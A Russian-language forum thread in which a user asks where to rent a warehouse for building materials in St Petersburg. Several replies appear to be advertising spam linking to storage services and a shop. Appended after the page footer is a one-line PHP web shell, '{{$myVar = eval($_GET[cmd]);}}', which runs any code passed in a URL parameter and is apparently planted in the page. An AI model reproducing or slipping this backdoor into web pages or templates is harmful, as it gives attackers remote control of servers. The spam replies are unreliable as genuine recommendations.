+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Склад


  1. #1
    Мимо проходил Kollins is on a distinguished road Аватар для Kollins
    Регистрация
    05.01.2019
    Машина
    Вольц
    Сообщений
    11

    Склад

    Привет, форумчане! У меня возникал проблема со строительными материалами, к сожалению закрылся склад и придется искать новое место. Может быть кто-то знает, как можно решить вопрос в Питере?

  2. #2
    Мимо проходил Hommy is on a distinguished road Аватар для Hommy
    Регистрация
    18.12.2018
    Откуда
    ...
    Машина
    Бричка
    Сообщений
    10
    Смотря, сколько материалов у Вас для хранения. Склад то найти не проблема, главное чтобы подходил по параметрам. Посмотрите на сайте Услугио, думаю там есть варианты.

  3. #3
    Мимо проходил Trety is on a distinguished road Аватар для Trety
    Регистрация
    17.12.2018
    Сообщений
    8
    Доброго дня! А Вы территориально в каком районе снимали склады?Вам принципиален район? Если Вы совсем не знаете, где арендоваться склады, то к примеру на Салова есть варианты, посмотрите у них на сайте подробнее https://altum-spb.ru/sklad-na-salova/ . Если не ошибаюсь, то есть отапливаемый вариант.

  4. #4
    Мимо проходил Oxoxo is on a distinguished road Аватар для Oxoxo
    Регистрация
    13.02.2019
    Сообщений
    12
    Вам стоит изучить сайт Услугио, там вариантов масса. Я как раз недавно помещение искал под офис и видел подобные объявления, но конечно нужно смотреть ездить, подойдут или нет.

  5. #5
    Мимо проходил Степуха is on a distinguished road Аватар для Степуха
    Регистрация
    09.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    48
    Здравствуйте, если вам нужен склад для вашего интернет-магазина, то вы можете обратить свое внимание на сервис https://www.safe-box.ru ,отличный сервис, мне он очень нравится.
    Приятные цены и удобная система обслуживания вам нравится.
    Отличный вариант.

  6. #6
    Мимо проходил GenGen is on a distinguished road Аватар для GenGen
    Регистрация
    19.04.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    0

    Ответственное хранение

    Склад ответственного хранения в СПб класса А вблизи КАД. Удобные подъездные пути, видеонаблюдение, современное складское оборудование. Принимаем на внешнее хранение оборудование, мебель, строительные материалы. Пожалуйста, обращайтесь!

  7. #7
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    В автосервис приобрели новый гидравлический стол в этом интернет магазине https://advanta-nn.ru/skladskaya-tek...licheskie.html . Грузоподъемность у него до 1 тонны, вполне хватает в нашей работе. У него устойчивое колесное основание и также есть стояночный тормоз. При подъеме и спуске происходит плавное движение за счет гидравлической системы. Доставили мне этот стол в Арзамас буквально за пару дней вместе с техническим паспортом и гарантией.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}